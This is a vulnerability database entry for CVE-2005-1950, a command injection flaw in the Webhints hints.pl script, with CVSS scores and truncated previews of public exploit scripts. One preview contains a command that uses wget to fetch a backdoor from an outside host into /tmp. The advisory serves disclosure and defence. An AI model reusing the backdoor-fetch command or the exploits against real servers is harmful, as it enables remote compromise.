7.5
CVSSv2

CVE-2005-1950

Published: 09/06/2005 Updated: 18/10/2016
CVSS v2 Base Score: 7.5 | Impact Score: 6.4 | Exploitability Score: 10
VMScore: 765
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P

Vulnerability Summary

hints.pl in Webhints 1.03 allows remote malicious users to execute arbitrary commands via shell metacharacters in the argument.

Vulnerable Product Search on Vulmon Subscribe to Product

darryl burgdorf webhints 1.3

Exploits

/* ************************************************************************************** * T r a p - S e t U n d e r g r o u n d H a c k i n g T e a m * ************************************************************************************** EXPLOIT FOR : WebHints Remote C0mmand Execution Vuln Coded By: A l p h a _ P r o g ...
# This exploit uses a backdoor that isn't located on this server # $cmde = "cd /tmp;wget wwwkhatotarhcom/NeT/alphatxt"; # change for your own needs /str0ke #!/usr/bin/perl ###################################################################################### # T r a p - S e t U n d e r g r o u n d H a c k i n g T e a m ...
#!/usr/bin/perl -w # # #emanuele@blackbox:~$ perl M4DR007-hintspl # # # ~~ wwwmadrootedums Security Group ~~ # # WebHints Software hintscgi # Remote Command Execution Vulnerability # Affected version: <= all # ~~ code by MadSheep ~~ # # # 06112005 # # #hostname: #localhost #port: (default: 80) #80 #path: (/cgi-bin/) #/cgi-bin/ #your ip (f ...